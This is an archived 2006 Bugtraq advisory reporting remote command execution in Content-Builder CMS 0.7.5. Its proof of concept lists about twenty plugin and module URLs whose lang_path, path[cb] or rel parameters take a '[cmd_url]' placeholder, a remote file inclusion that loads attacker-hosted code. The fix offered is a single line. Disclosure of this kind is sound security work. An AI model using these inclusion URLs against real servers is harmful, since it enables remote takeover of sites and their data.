lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sun, 11 Jun 2006 23:44:35 +0200
From: Federico Fazzi <federico@...istici.org>
To: milw0rm-submit <submit@...w0rm.com>,
	secunia-vuln-report <vuln@...unia.com>, bugtraq@...urityfocus.com,
	securiteam <news@...uriteam.com>
Subject: Content-Builder (CMS) 0.7.5, Remote command execution


-----------------------------------------------------
Advisory id: FSA:012

Author:    Federico Fazzi
Date:	   11/06/2006, 22:30
Sinthesis: Content-Builder (CMS) 0.7.5, Remote command execution
Type:	   high
Product:   http://www.content-builder.de/
Patch:	   unavailable
-----------------------------------------------------


1) Description:

vulnerables page:

Multiple vulnerabilities, see poc.

2) Proof of concept:

http://example/[cb_path]/cms/plugins/col_man/column.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/poll/poll.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/user_managment/usrPortrait.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/user_managment/user.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/media_manager/media.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/events/permanent.eventMonth.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/events/events.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/newsletter2/newsletter.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/modules/guestbook/guestbook.inc.php?path[cb]=[cmd_url]/
http://example/[cb_path]/modules/shoutbox/shoutBox.php?path[cb]=[cmd_url]/
http://example/[cb_path]/modules/download/overview.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/download/detailView.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/sitemap/sitemap.inc.php?path[cb]=[cmd_url]/
http://example/[cb_path]/modules/article/fullarticle.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/article/comments.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/article2/overview.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/article2/fullarticle.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/article2/comments.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/headline/headlineBox.php?rel=[cmd_url]/
http://example/[cb_path]/modules/headline/showHeadline.inc.php?rel=[cmd_url]/

(note: add a cmd url with final slash (/))

3) Solution:

sanitized all variables on all files.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ